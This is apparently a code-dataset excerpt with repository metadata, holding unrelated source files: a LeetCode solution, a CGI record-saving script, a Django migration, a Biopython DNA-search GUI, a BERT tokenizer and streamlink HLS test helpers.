] | null | null | null | problems/remove_element/solution.py | nagahshi/LeetCodeProblems_Repository | ed9831141fdd6ca432acb25318ef5afdb3a7fd3a | [
"MIT"
] | null | null | null | problems/remove_element/solution.py | nagahshi/LeetCodeProblems_Repository | ed9831141fdd6ca432acb25318ef5afdb3a7fd3a | [
"MIT"
] | null | null | null | class Solution(object):
def removeElement(self, nums: List[int], val: int) -> int:
"""
:type nums: list
:type val: int
:rtype: int (size of num)
"""
while val in nums:
nums.remove(val)
return len(nums) | 27.4 | 62 | 0.50365 |
38380a24448b26b5a31f3dcdef75bf92e9def696 | 1,844 | py | Python | cgi-bin/passmots/salvaOrigemRegistro.py | wsampaio/multi_agenda_py | 72c9cf4d8b26827a9eba6de3119e63464d312aea | [
"CC-BY-4.0"
] | null | null | null | cgi-bin/passmots/salvaOrigemRegistro.py | wsampaio/multi_agenda_py | 72c9cf4d8b26827a9eba6de3119e63464d312aea | [
"CC-BY-4.0"
] | null | null | null | cgi-bin/passmots/salvaOrigemRegistro.py | wsampaio/multi_agenda_py | 72c9cf4d8b26827a9eba6de3119e63464d312aea | [
"CC-BY-4.0"
] | null | null | null | #!/usr/bin/env python3
#
# Este arquivo é parte do programa multi_agenda
#
# Esta obra está licenciada com uma
# Licença Creative Commons Atribuição 4.0 Internacional.
# (CC BY 4.0 Internacional)
#
# Para ver uma cópia da licença, visite
# https://creativecommons.org/licenses/by/4.0/legalcode
#
# WELLINGTON SAMPAIO - wsampaio@yahoo.com
# https://www.linkedin.com/in/wellsampaio/
#
import sys
import cgi
from os.path import dirname, realpath, sep, pardir
sys.path.append((dirname(realpath(__file__)) + sep + pardir))
import cgitb
cgitb.enable()
from objetos.passmots.OrigemRegistro import OrigemRegistro
from objetos.passmots.OrigemRegistroDAO import OrigemRegistroDAO
codOrigemRegistro = 0
form = cgi.FieldStorage()
origemRegistro = OrigemRegistro()
origemRegistroDAO = OrigemRegistroDAO()
if str(form) != "FieldStorage(None, None, '')":
codOrigemRegistro = int(form.getvalue("codOrigemRegistro"))
if form.getvalue("codOrigemRegistro"):
origemRegistro.setCodOrigemRegistro(int(form.getvalue("codOrigemRegistro")))
if form.getvalue("origemRegistro"):
origemRegistro.setOrigemRegistro(str(form.getvalue("origemRegistro")))
if codOrigemRegistro > 0:
if form.getvalue("delete"):
origemRegistroDAO.delete(origemRegistro.getCodOrigemRegistro())
else:
origemRegistroDAO.update(origemRegistro)
else:
origemRegistroDAO.insert(origemRegistro)
else:
#tentando enviar status de erro
#header("HTTP/1.0 404 Not Found");
#print "Status: 404 Not Found\r\n"
#print "Content-Type: text/html\r\n\r\n"
#print "Status: 400 Bad Request\r\n"
pass
#print("Content-type: text/html\n")
#print("Content-type: application/json\n")
#print("form = " + str(form))
#print("codHistorico = " + str(codHistorico))
if form.getvalue("delete"):
print("DELETE")
else:
print("não delete")
print("""
Dados Salvos
""")
| 20.719101 | 78 | 0.743492 |
22c5e29803815291c40cae37e56aea0fb333e1fc | 355 | py | Python | project/editorial/migrations/0015_remove_videoasset_embed.py | cojennin/facet | 230e65316134b3399a35d40034728e61ba63cb2a | [
"MIT"
] | 25 | 2015-07-13T22:16:36.000Z | 2021-11-11T02:45:32.000Z | project/editorial/migrations/0015_remove_videoasset_embed.py | cojennin/facet | 230e65316134b3399a35d40034728e61ba63cb2a | [
"MIT"
] | 74 | 2015-12-01T18:57:47.000Z | 2022-03-11T23:25:47.000Z | project/editorial/migrations/0015_remove_videoasset_embed.py | cojennin/facet | 230e65316134b3399a35d40034728e61ba63cb2a | [
"MIT"
] | 6 | 2016-01-08T21:12:43.000Z | 2019-05-20T16:07:56.000Z | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('editorial', '0014_videoasset_embed'),
]
operations = [
migrations.RemoveField(
model_name='videoasset',
name='embed',
),
]
| 18.684211 | 47 | 0.605634 |
15c140aa69963c538a5e1891ea45929940c8e9ad | 6,268 | py | Python | Scripts/xbbtools/xbb_search.py | mikepm35/biopython | 9f2d4d8d70ec7223df35fdc3d9c4a3c018756327 | [
"BSD-3-Clause"
] | 1 | 2020-02-13T14:32:44.000Z | 2020-02-13T14:32:44.000Z | Scripts/xbbtools/xbb_search.py | EsamTolba/biopython | 120616cf0d28cb8e581898afd6604e5a2065a137 | [
"BSD-3-Clause"
] | null | null | null | Scripts/xbbtools/xbb_search.py | EsamTolba/biopython | 120616cf0d28cb8e581898afd6604e5a2065a137 | [
"BSD-3-Clause"
] | 1 | 2019-03-14T18:59:30.000Z | 2019-03-14T18:59:30.000Z | #!/usr/bin/env python
# Copyright 2000 by Thomas Sicheritz-Ponten.
# Copyrigth 2016 by Markus Piotrowski.
# All rights reserved.
# This code is part of the Biopython distribution and governed by its
# license. Please see the LICENSE file that should have been included
# as part of this package.
# Created: Sun Dec 3 13:38:52 2000
# thomas@cbs.dtu.dk, http://www.cbs.dtu.dk/thomas
"""Search code for graphical Xbbtools tool."""
import re
try: # Python 2
import Tkinter as tk
import ttk
import tkColorChooser as colorchooser
except ImportError: # Python 3
import tkinter as tk
import tkinter.ttk as ttk
from tkinter import colorchooser
from Bio.Data.IUPACData import ambiguous_dna_values
from Bio.Seq import reverse_complement
import xbb_widget
class DNAsearch(object):
"""Class to search a DNA sequence."""
def __init__(self):
"""Set up the alphabet."""
self.init_alphabet()
self.sequence = ''
def init_alphabet(self):
"""Expand alphabet values for ambiguous codes."""
self.alphabet = ambiguous_dna_values
other = ''.join(self.alphabet)
self.alphabet['N'] = self.alphabet['N'] + other
for key in self.alphabet:
if key == 'N':
continue
if key in self.alphabet[key]:
continue
self.alphabet[key] = self.alphabet[key] + key
def SetSeq(self, seq):
"""Set sequence."""
self.sequence = seq
def SetPattern(self, pattern):
"""Convert search pattern to regular expression."""
self.pattern = pattern
self.rx_pattern = self.IUPAC2regex(pattern)
self.rx = re.compile(self.rx_pattern)
def IUPAC2regex(self, s):
"""Translate search text into pattern."""
rx = ''
for i in s:
r = self.alphabet.get(i, i)
if len(r) > 1:
rx = '%s[%s]' % (rx, r)
else:
rx += r
return rx
def _Search(self, start=0):
"""Search and return MatchObject (PRIVAT)."""
# Only called from SearchAll. Is it used?
pos = self.rx.search(self.sequence, start)
return pos
def Search(self, start=0):
"""Search for query sequence and return position."""
pos = self.rx.search(self.sequence, start)
if pos:
return pos.start()
else:
return -1
def SearchAll(self):
"""Search the whole sequence."""
# Doesn't seem to be used...
pos = -1
positions = []
while True:
m = self._Search(pos + 1)
if not m:
break
pos = m.start()
if pos == -1:
break
positions.append(pos)
return positions
class XDNAsearch(tk.Toplevel, DNAsearch):
"""Graphical tools to perform the DNA search."""
def __init__(self, seq='', master=None, highlight=0):
"""Initialize the search GUI."""
DNAsearch.__init__(self)
self.master = master
self.highlight = highlight
self.colors = []
self.init_graphics()
self.sequence = seq
self.cur_pos = 0
def init_graphics(self):
"""Build the search window."""
tk.Toplevel.__init__(self, self.master)
self.frame = ttk.Frame(self)
self.frame.pack(fill=tk.BOTH, expand=1)
self.search_entry = ttk.Entry(self.frame)
self.search_entry.pack(fill=tk.BOTH, expand=1)
f2 = ttk.Frame(self.frame)
f2.pack(side=tk.TOP, fill=tk.BOTH, expand=1)
f = f2
self.forward = ttk.Button(f, text='Search +', command=self.do_search)
self.forward.pack(side=tk.LEFT)
self.forward = ttk.Button(
f, text='Search -',
command=lambda x=self.do_search: x(other_strand=1))
self.forward.pack(side=tk.LEFT)
self.cancel = ttk.Button(f, text='Cancel', command=self.exit)
self.cancel.pack(side=tk.LEFT)
self.current_color = 'cyan'
self.colorb = ttk.Button(f, text='Color', command=self.change_color)
self.colorb.pack(side=tk.LEFT)
self.config_color(self.current_color)
def config_color(self, color=None):
"""Set color for found sequence tag."""
if not self.highlight:
return
if not color:
color = colorchooser.askcolor()[1]
if not color:
color = 'cyan'
self.current_color = color
self.current_tag = 'searched_%s' % self.current_color
self.master.tag_config(self.current_tag, background=self.current_color)
self.master.tag_config(self.current_tag + 'R',
background=self.current_color, underline=1)
self.colors.append(color)
def change_color(self):
"""Call back for color button."""
self.config_color()
def get_pattern(self):
"""Retrieve query sequence."""
pattern = self.search_entry.get()
return pattern
def do_search(self, other_strand=0):
"""Start the search."""
pattern = self.get_pattern()
if other_strand:
pattern = reverse_complement(pattern)
self.SetPattern(pattern)
pos = self.Search(self.cur_pos)
self.cur_pos = pos + 1
w = self.master
if pos != -1:
if self.highlight:
start, stop = pos, pos + len(self.pattern)
if other_strand:
w.tag_add(self.current_tag + 'R', '1.%d' % start,
'1.%s' % stop)
else:
w.tag_add(self.current_tag, '1.%d' % start, '1.%s' % stop)
w.see('1.%d' % start)
def exit(self):
"""Clean up on exit."""
for c in self.colors:
self.master.tag_remove('searched_%s' % c, 1.0, tk.END)
self.master.tag_remove('searched_%sR' % c, 1.0, tk.END)
self.destroy()
del(self)
if __name__ == '__main__':
win = tk.Tk()
xbbtools = xbb_widget.xbb_widget()
seq = 'ATGGTGTGTGTGTACGATCGCCCCCCCCAGTCGATCGATGCATCGTA'
xbbtools.insert_sequence(('Test_seq', seq))
xbbtools.search()
win.mainloop()
| 30.72549 | 79 | 0.575463 |
75d479b2e671da56a4ab026019d9566aaadd7f37 | 21,129 | py | Python | projects/QQP/tokenizer/bert_tokenization.py | Oneflow-Inc/libai | e473bd3962f07b1e37232d2be39c8257df0ec0f3 | [
"Apache-2.0"
] | 55 | 2021-12-10T08:47:06.000Z | 2022-03-28T09:02:15.000Z | projects/QQP/tokenizer/bert_tokenization.py | Oneflow-Inc/libai | e473bd3962f07b1e37232d2be39c8257df0ec0f3 | [
"Apache-2.0"
] | 106 | 2021-11-03T05:16:45.000Z | 2022-03-31T06:16:23.000Z | projects/QQP/tokenizer/bert_tokenization.py | Oneflow-Inc/libai | e473bd3962f07b1e37232d2be39c8257df0ec0f3 | [
"Apache-2.0"
] | 13 | 2021-12-29T08:12:08.000Z | 2022-03-28T06:59:45.000Z | # coding=utf-8
# Copyright 2018 The Google AI Language Team Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tokenization classes."""
import collections
import re
import sys
import unicodedata
import six
is_python3 = sys.version_info.major == 3
if is_python3:
unicode = str
def validate_case_matches_checkpoint(do_lower_case, init_checkpoint):
"""Checks whether the casing config is consistent with the checkpoint name."""
# The casing has to be passed in by the user and there is no explicit check
# as to whether it matches the checkpoint. The casing information probably
# should have been stored in the bert_config.json file, but it's not, so
# we have to heuristically detect it to validate.
if not init_checkpoint:
return
m = re.match("^.*?([A-Za-z0-9_-]+)/bert_model.ckpt", init_checkpoint)
if m is None:
return
model_name = m.group(1)
lower_models = [
"uncased_L-24_H-1024_A-16",
"uncased_L-12_H-768_A-12",
"multilingual_L-12_H-768_A-12",
"chinese_L-12_H-768_A-12",
]
cased_models = [
"cased_L-12_H-768_A-12",
"cased_L-24_H-1024_A-16",
"multi_cased_L-12_H-768_A-12",
]
is_bad_config = False
if model_name in lower_models and not do_lower_case:
is_bad_config = True
actual_flag = "False"
case_name = "lowercased"
opposite_flag = "True"
if model_name in cased_models and do_lower_case:
is_bad_config = True
actual_flag = "True"
case_name = "cased"
opposite_flag = "False"
if is_bad_config:
raise ValueError(
"You passed in `--do_lower_case=%s` with `--init_checkpoint=%s`. "
"However, `%s` seems to be a %s model, so you "
"should pass in `--do_lower_case=%s` so that the fine-tuning matches "
"how the model was pre-training. If this error is wrong, please "
"just comment out this check."
% (actual_flag, init_checkpoint, model_name, case_name, opposite_flag)
)
def convert_to_unicode(text):
"""Converts `text` to Unicode (if it's not already), assuming utf-8 input."""
if six.PY3:
if isinstance(text, str):
return text
elif isinstance(text, bytes):
return text.decode("utf-8", "ignore")
else:
raise ValueError("Unsupported string type: %s" % (type(text)))
elif six.PY2:
if isinstance(text, str):
return text.decode("utf-8", "ignore")
elif isinstance(text, unicode):
return text
else:
raise ValueError("Unsupported string type: %s" % (type(text)))
else:
raise ValueError("Not running on Python2 or Python 3?")
def printable_text(text):
"""Returns text encoded in a way suitable for print or `tf.logging`."""
# These functions want `str` for both Python2 and Python3, but in one case
# it's a Unicode string and in the other it's a byte string.
if six.PY3:
if isinstance(text, str):
return text
elif isinstance(text, bytes):
return text.decode("utf-8", "ignore")
else:
raise ValueError("Unsupported string type: %s" % (type(text)))
elif six.PY2:
if isinstance(text, str):
return text
elif isinstance(text, unicode):
return text.encode("utf-8")
else:
raise ValueError("Unsupported string type: %s" % (type(text)))
else:
raise ValueError("Not running on Python2 or Python 3?")
def load_vocab(vocab_file):
"""Loads a vocabulary file into a dictionary."""
vocab = collections.OrderedDict()
index = 0
with open(vocab_file, "r", encoding="utf-8") as reader:
while True:
token = convert_to_unicode(reader.readline())
if not token:
break
token = token.strip()
vocab[token] = index
index += 1
return vocab
def convert_by_vocab(vocab, items, inv=False):
"""Converts a sequence of [tokens|ids] using the vocab.。"""
output = []
for item in items:
if not inv:
if _is_chinese_substr(item):
output.append(vocab[item[2:]] + len(vocab))
else:
output.append(vocab[item])
else:
if item > len(vocab):
output.append("##" + vocab[item - len(vocab)])
else:
output.append(vocab[item])
return output
def convert_tokens_to_ids(vocab, tokens):
return convert_by_vocab(vocab, tokens)
def convert_ids_to_tokens(inv_vocab, ids):
return convert_by_vocab(inv_vocab, ids, inv=True)
def whitespace_tokenize(text):
"""Runs basic whitespace cleaning and splitting on a piece of text."""
text = text.strip()
if not text:
return []
tokens = text.split()
return tokens
class FullTokenizer(object):
"""Runs end-to-end tokenziation."""
def __init__(self, vocab_file, do_lower_case=True, do_chinese_wwm=False):
self.vocab = load_vocab(vocab_file) # _BertTokenizer会增加[BOS]和[EOS]
self.inv_vocab = {v: k for k, v in self.vocab.items()}
if not do_chinese_wwm:
self.basic_tokenizer = BasicTokenizer(do_lower_case=do_lower_case)
else:
self.basic_tokenizer = BasicTokenizerWithChineseWWM(do_lower_case)
self.wordpiece_tokenizer = WordpieceTokenizer(vocab=self.vocab)
def tokenize(self, text):
split_tokens = []
for token in self.basic_tokenizer.tokenize(text):
for sub_token in self.wordpiece_tokenizer.tokenize(token):
split_tokens.append(sub_token)
return split_tokens
def convert_tokens_to_ids(self, tokens):
return convert_by_vocab(self.vocab, tokens)
def convert_ids_to_tokens(self, ids):
return convert_by_vocab(self.inv_vocab, ids, inv=True)
@staticmethod
def convert_tokens_to_string(tokens, clean_up_tokenization_spaces=True):
"""Converts a sequence of tokens (string) to a single string."""
def clean_up_tokenization(out_string):
"""Clean up a list of simple English tokenization artifacts
like spaces before punctuations and abreviated forms.
"""
out_string = (
out_string.replace(" .", ".")
.replace(" ?", "?")
.replace(" !", "!")
.replace(" ,", ",")
.replace(" ' ", "'")
.replace(" n't", "n't")
.replace(" 'm", "'m")
.replace(" 's", "'s")
.replace(" 've", "'ve")
.replace(" 're", "'re")
)
return out_string
text = " ".join(tokens).replace(" ##", "").strip()
if clean_up_tokenization_spaces:
clean_text = clean_up_tokenization(text)
return clean_text
else:
return text
def vocab_size(self):
return len(self.vocab)
class BasicTokenizer(object):
    """Runs basic tokenization (punctuation splitting, lower casing, etc.)."""

    # Inclusive codepoint ranges of the CJK Unified Ideographs blocks
    # (https://en.wikipedia.org/wiki/CJK_Unified_Ideographs_(Unicode_block)).
    # Note these blocks do NOT cover Hangul, Hiragana or Katakana; those
    # scripts use space-separated words and need no special handling.
    _CJK_RANGES = (
        (0x4E00, 0x9FFF),
        (0x3400, 0x4DBF),
        (0x20000, 0x2A6DF),
        (0x2A700, 0x2B73F),
        (0x2B740, 0x2B81F),
        (0x2B820, 0x2CEAF),
        (0xF900, 0xFAFF),
        (0x2F800, 0x2FA1F),
    )

    def __init__(self, do_lower_case=True):
        """Constructs a BasicTokenizer.

        Args:
          do_lower_case: Whether to lower case the input.
        """
        self.do_lower_case = do_lower_case

    def tokenize(self, text):
        """Tokenizes a piece of text."""
        text = convert_to_unicode(text)
        text = self._clean_text(text)
        # Space-pad CJK characters first (added November 1st, 2018 for the
        # multilingual and Chinese models; harmless for English models since
        # they contain essentially no Chinese data).
        text = self._tokenize_chinese_chars(text)
        pieces = []
        for raw_token in whitespace_tokenize(text):
            if self.do_lower_case:
                raw_token = self._run_strip_accents(raw_token.lower())
            pieces.extend(self._run_split_on_punc(raw_token))
        return whitespace_tokenize(" ".join(pieces))

    def _run_strip_accents(self, text):
        """Strips accents from a piece of text."""
        decomposed = unicodedata.normalize("NFD", text)
        # Drop the combining marks (category "Mn") produced by decomposition.
        return "".join(
            ch for ch in decomposed if unicodedata.category(ch) != "Mn"
        )

    def _run_split_on_punc(self, text):
        """Splits punctuation on a piece of text."""
        pieces = []
        word_open = False
        for ch in text:
            if _is_punctuation(ch):
                # Each punctuation mark becomes its own single-char piece.
                pieces.append([ch])
                word_open = False
            else:
                if not word_open:
                    pieces.append([])
                    word_open = True
                pieces[-1].append(ch)
        return ["".join(piece) for piece in pieces]

    def _tokenize_chinese_chars(self, text):
        """Adds whitespace around any CJK character."""
        out = []
        for ch in text:
            if self._is_chinese_char(ord(ch)):
                out.extend((" ", ch, " "))
            else:
                out.append(ch)
        return "".join(out)

    def _is_chinese_char(self, cp):
        """Checks whether CP is the codepoint of a CJK character."""
        return any(lo <= cp <= hi for lo, hi in self._CJK_RANGES)

    def _clean_text(self, text):
        """Performs invalid character removal and whitespace cleanup on text."""
        cleaned = []
        for ch in text:
            code = ord(ch)
            # Drop NULs, the Unicode replacement character and controls.
            if code == 0 or code == 0xFFFD or _is_control(ch):
                continue
            cleaned.append(" " if _is_whitespace(ch) else ch)
        return "".join(cleaned)
class WordpieceTokenizer(object):
    """Runs WordPiece tokenziation."""

    def __init__(self, vocab, unk_token="[UNK]", max_input_chars_per_word=200):
        # vocab: mapping/set of known tokens; membership tests drive the
        # greedy longest-match loop in tokenize().
        self.vocab = vocab
        self.unk_token = unk_token
        self.max_input_chars_per_word = max_input_chars_per_word

    def tokenize(self, text):
        """Tokenizes a piece of text into its word pieces.

        This uses a greedy longest-match-first algorithm to perform tokenization
        using the given vocabulary.

        For example:
          input = "unaffable"
          output = ["un", "##aff", "##able"]
          input = "有没有"
          output = ["有", "##没", "##有"]

        (NickPan) Special handling for Chinese:
          A Chinese sub-token and the bare character should not use different
          embeddings, i.e. "有" and "##有" should share one id.  Some Chinese
          vocabularies contain the "##"-prefixed sub-token forms and some
          (e.g. bert4keras) do not; to support both, a Chinese sub-token is
          assigned the id vocab_size + id(substr with "##" removed), which is
          then taken into account when the sample mask is built.  Therefore,
          during wordpiece tokenization a Chinese sub-token "##有" only needs
          the bare "有" to be present in the vocabulary.

        Args:
          text: A single token or whitespace separated tokens. This should have
            already been passed through `BasicTokenizer`.

        Returns:
          A list of wordpiece tokens.
        """
        text = convert_to_unicode(text)

        output_tokens = []
        for token in whitespace_tokenize(text):
            chars = list(token)
            if len(chars) > self.max_input_chars_per_word:
                # Overly long tokens map to the unknown token wholesale.
                output_tokens.append(self.unk_token)
                continue

            is_bad = False
            start = 0
            sub_tokens = []
            while start < len(chars):
                end = len(chars)
                cur_substr = None
                # Greedy longest match: shrink the candidate from the right
                # until a vocabulary hit is found.
                while start < end:
                    substr = "".join(chars[start:end])
                    if start > 0:
                        substr = "##" + substr
                    if substr.startswith("##"):
                        if _is_chinese_substr(substr):
                            if substr[2:] in self.vocab:  # Chinese sub-token: look up the bare form
                                cur_substr = substr
                                break
                        else:
                            if substr in self.vocab:
                                cur_substr = substr  # non-Chinese (e.g. English) sub-token
                                break
                    else:
                        if substr in self.vocab:  # not a sub-token: a single char or a whole Chinese word
                            cur_substr = substr
                            break
                    end -= 1
                if cur_substr is None:
                    # No prefix of the remainder is in the vocab -> the whole
                    # token is unknown.
                    is_bad = True
                    break
                sub_tokens.append(cur_substr)
                start = end

            if is_bad:
                output_tokens.append(self.unk_token)
            else:
                output_tokens.extend(sub_tokens)
        return output_tokens
def _is_whitespace(char):
"""Checks whether `chars` is a whitespace character."""
# \t, \n, and \r are technically contorl characters but we treat them
# as whitespace since they are generally considered as such.
if char == " " or char == "\t" or char == "\n" or char == "\r":
return True
cat = unicodedata.category(char)
if cat == "Zs":
return True
return False
def _is_control(char):
"""Checks whether `chars` is a control character."""
# These are technically control characters but we count them as whitespace
# characters.
if char == "\t" or char == "\n" or char == "\r":
return False
cat = unicodedata.category(char)
if cat in ("Cc", "Cf"):
return True
return False
def _is_punctuation(char):
"""Checks whether `chars` is a punctuation character."""
cp = ord(char)
# We treat all non-letter/number ASCII as punctuation.
# Characters such as "^", "$", and "`" are not in the Unicode
# Punctuation class but we treat them as punctuation anyways, for
# consistency.
if (
(cp >= 33 and cp <= 47)
or (cp >= 58 and cp <= 64)
or (cp >= 91 and cp <= 96)
or (cp >= 123 and cp <= 126)
):
return True
cat = unicodedata.category(char)
if cat.startswith("P"):
return True
return False
class BasicTokenizerWithChineseWWM(object):
    """Runs basic tokenization (punctuation splitting, lower casing, etc.).

    (nickpan) Mixed Chinese/non-Chinese text gets special handling; see
    _tokenize_chinese_chars: pure-Chinese runs are segmented with jieba
    instead of being split into single characters.
    """

    # Inclusive codepoint ranges of the CJK Unified Ideographs blocks
    # (https://en.wikipedia.org/wiki/CJK_Unified_Ideographs_(Unicode_block)).
    # Hangul, Hiragana and Katakana live in other blocks and are handled
    # like all other space-separated languages.
    _CJK_RANGES = (
        (0x4E00, 0x9FFF),
        (0x3400, 0x4DBF),
        (0x20000, 0x2A6DF),
        (0x2A700, 0x2B73F),
        (0x2B740, 0x2B81F),
        (0x2B820, 0x2CEAF),
        (0xF900, 0xFAFF),
        (0x2F800, 0x2FA1F),
    )

    def __init__(self, do_lower_case=True):
        """Constructs a BasicTokenizer.

        Args:
          do_lower_case: Whether to lower case the input.
        """
        try:
            import jieba
        except ImportError:
            raise ImportError("Chinese WWM need jieba")
        # Whole-word masking needs a Chinese word segmenter; HMM is disabled
        # so the cuts are deterministic.
        self.pre_tokenizer = lambda piece: jieba.lcut(piece, HMM=False)
        self.do_lower_case = do_lower_case

    def tokenize(self, text):
        """Tokenizes a piece of text."""
        text = convert_to_unicode(text)
        text = self._clean_text(text)
        # Segment the Chinese runs (and pad them with spaces) before the
        # whitespace tokenization below; see _tokenize_chinese_chars.
        text = self._tokenize_chinese_chars(text)
        pieces = []
        for raw_token in whitespace_tokenize(text):
            if self.do_lower_case:
                raw_token = self._run_strip_accents(raw_token.lower())
            pieces.extend(self._run_split_on_punc(raw_token))
        return whitespace_tokenize(" ".join(pieces))

    def _run_strip_accents(self, text):
        """Strips accents from a piece of text."""
        decomposed = unicodedata.normalize("NFD", text)
        # Drop the combining marks (category "Mn") produced by decomposition.
        return "".join(
            ch for ch in decomposed if unicodedata.category(ch) != "Mn"
        )

    def _run_split_on_punc(self, text):
        """Splits punctuation on a piece of text."""
        pieces = []
        word_open = False
        for ch in text:
            if _is_punctuation(ch):
                # Each punctuation mark becomes its own single-char piece.
                pieces.append([ch])
                word_open = False
            else:
                if not word_open:
                    pieces.append([])
                    word_open = True
                pieces[-1].append(ch)
        return ["".join(piece) for piece in pieces]

    def _tokenize_chinese_chars(self, text):
        """Adds whitespace around any CJK character.

        (nickpan) Contiguous runs of pure Chinese are additionally segmented
        with the pre-tokenizer (jieba); every resulting word is padded with
        spaces on both sides.
        """
        out = []

        def flush(run):
            # Segment the pending Chinese run and emit each word space-padded.
            for word in self.pre_tokenizer(run):
                out.extend((" ", word, " "))

        run = ""
        for ch in text:
            if self._is_chinese_char(ord(ch)):
                run += ch
            else:
                flush(run)
                run = ""
                out.append(ch)
        flush(run)
        return "".join(out)

    def _is_chinese_char(self, cp):
        """Checks whether CP is the codepoint of a CJK character."""
        return any(lo <= cp <= hi for lo, hi in self._CJK_RANGES)

    def _clean_text(self, text):
        """Performs invalid character removal and whitespace cleanup on text."""
        cleaned = []
        for ch in text:
            code = ord(ch)
            # Drop NULs, the Unicode replacement character and controls.
            if code == 0 or code == 0xFFFD or _is_control(ch):
                continue
            cleaned.append(" " if _is_whitespace(ch) else ch)
        return "".join(cleaned)
def _is_chinese_substr(char):
return re.findall("##[\u4E00-\u9FA5]", char)
| 33.860577 | 84 | 0.572673 |
165b8e8c4b1a7d413d83edb7485f2b41f1ad079a | 8,977 | py | Python | tests/mixins/stream_hls.py | lijinquan123/streamlink | 1e0ff12f38df4879a704c11376b7e2a118a01e3b | [
"BSD-2-Clause"
] | 1 | 2021-07-19T17:25:11.000Z | 2021-07-19T17:25:11.000Z | tests/mixins/stream_hls.py | Inncee81/streamlink | 07029669d58a835bd05029316211343eef78ddf2 | [
"BSD-2-Clause"
] | 2 | 2021-08-06T01:59:11.000Z | 2022-01-20T08:27:45.000Z | tests/mixins/stream_hls.py | Inncee81/streamlink | 07029669d58a835bd05029316211343eef78ddf2 | [
"BSD-2-Clause"
] | 1 | 2021-08-05T12:15:07.000Z | 2021-08-05T12:15:07.000Z | import unittest
from binascii import hexlify
from collections import OrderedDict
from functools import partial
from threading import Event, Thread
import requests_mock
from streamlink import Streamlink
from streamlink.stream.hls import HLSStream, HLSStreamWriter as _HLSStreamWriter
class HLSItemBase:
    """Base class of mocked HLS playlist items: knows the item's mocked URL."""
    path = ""

    def url(self, namespace):
        """Return the mocked absolute URL of this item under *namespace*."""
        template = "http://mocked/{namespace}/{path}"
        return template.format(namespace=namespace, path=self.path)
class Playlist(HLSItemBase):
    """A mocked HLS media playlist assembled from tags and segments."""
    path = "playlist.m3u8"

    def __init__(self, mediasequence=None, segments=None, end=False, targetduration=0, version=7):
        header = [
            Tag("EXTM3U"),
            Tag("EXT-X-VERSION", int(version)),
            Tag("EXT-X-TARGETDURATION", int(targetduration)),
        ]
        if mediasequence is not None:  # pragma: no branch
            header.append(Tag("EXT-X-MEDIA-SEQUENCE", int(mediasequence)))
        body = list(segments) if segments else []
        self.items = header + body
        if end:
            self.items.append(Tag("EXT-X-ENDLIST"))

    def build(self, *args, **kwargs):
        """Render the playlist as newline-joined tag/segment lines."""
        lines = [entry.build(*args, **kwargs) for entry in self.items]
        return "\n".join(lines)
class Tag(HLSItemBase):
    """A mocked HLS tag line, e.g. ``#EXT-X-VERSION:7``.

    ``attrs`` may be ``None`` (bare tag), a mapping (rendered as comma-joined
    ``KEY=VALUE`` pairs, where a callable value is invoked with the tag and
    the build arguments), or any other object (rendered via ``str``).
    """

    def __init__(self, name, attrs=None):
        self.name = name
        self.attrs = attrs

    @classmethod
    def val_quoted_string(cls, value):
        """Render *value* as a double-quoted attribute value."""
        return "\"{0}\"".format(value)

    @classmethod
    def val_hex(cls, value):
        """Render *value* (bytes) as a ``0x``-prefixed hex attribute value."""
        return "0x{0}".format(hexlify(value).decode("ascii"))

    def build(self, *args, **kwargs):
        """Render the tag line; extra args are forwarded to callable attr values."""
        attrs = None
        # isinstance instead of a strict type() comparison so that dict
        # subclasses (e.g. OrderedDict) are also rendered as KEY=VALUE pairs
        # instead of falling through to str().
        if isinstance(self.attrs, dict):
            attrs = ",".join([
                "{0}={1}".format(key, value(self, *args, **kwargs) if callable(value) else value)
                for (key, value) in self.attrs.items()
            ])
        elif self.attrs is not None:
            attrs = str(self.attrs)
        return "#{name}{attrs}".format(name=self.name, attrs=":{0}".format(attrs) if attrs else "")
class Segment(HLSItemBase):
    """A mocked HLS media segment with a deterministic payload."""

    def __init__(self, num, title=None, duration=None, path_relative=True):
        self.num = int(num or 0)
        self.title = str(title or "")
        self.duration = float(duration or 1)
        self.path_relative = bool(path_relative)
        # The payload is derived from the segment number so tests can verify
        # exactly which segments were downloaded.
        self.content = "[{0}]".format(self.num).encode("ascii")

    @property
    def path(self):
        return "segment{0}.ts".format(self.num)

    def build(self, namespace):
        """Render the ``#EXTINF`` line plus the (relative or absolute) path."""
        location = self.path if self.path_relative else self.url(namespace)
        return "#EXTINF:{duration:.3f},{title}\n{path}".format(
            duration=self.duration,
            title=self.title,
            path=location,
        )
class EventedHLSStreamWriter(_HLSStreamWriter):
    """HLS stream writer whose segment writes are gated by events.

    The test sets ``write_wait`` to release exactly one write, then blocks on
    ``write_done`` until that write has finished; an exception raised while
    writing is captured in ``write_error`` instead of dying inside the thread.
    """

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.write_wait = Event()   # set by the test to release one write
        self.write_done = Event()   # set here once a write has finished
        self.write_error = None     # exception raised during a write, if any

    def write(self, *args, **kwargs):
        # only write once per step
        self.write_wait.wait()
        self.write_wait.clear()

        try:
            # don't write again during teardown
            if not self.closed:
                super().write(*args, **kwargs)
        except Exception as err:
            # Surface the failure to the main thread and stop the stream.
            self.write_error = err
            self.reader.close()
        finally:
            # notify main thread that writing has finished
            self.write_done.set()
class HLSStreamReadThread(Thread):
    """
    Run the reader on a separate thread, so that each read can be controlled from within the main thread
    """

    def __init__(self, session, stream, *args, **kwargs):
        """
        :param Streamlink session:
        :param HLSStream stream:
        """
        Thread.__init__(self, *args, **kwargs)
        self.daemon = True

        self.read_wait = Event()   # set by the test to release one read
        self.read_once = Event()   # set once at least one read was attempted
        self.read_done = Event()   # set after each read step has completed
        self.read_all = False      # when True, drain the whole stream in one step
        self.data = []             # chunks read so far (bytes)
        self.error = None          # OSError raised by the reader, if any

        self.session = session
        self.stream = stream
        self.reader = stream.open()

        # ensure that at least one read was attempted before closing the writer thread early
        # otherwise, the writer will close the reader's buffer, making it not block on read and yielding empty results
        def _await_read_then_close():
            self.read_once.wait(timeout=5)
            return self.writer_close()

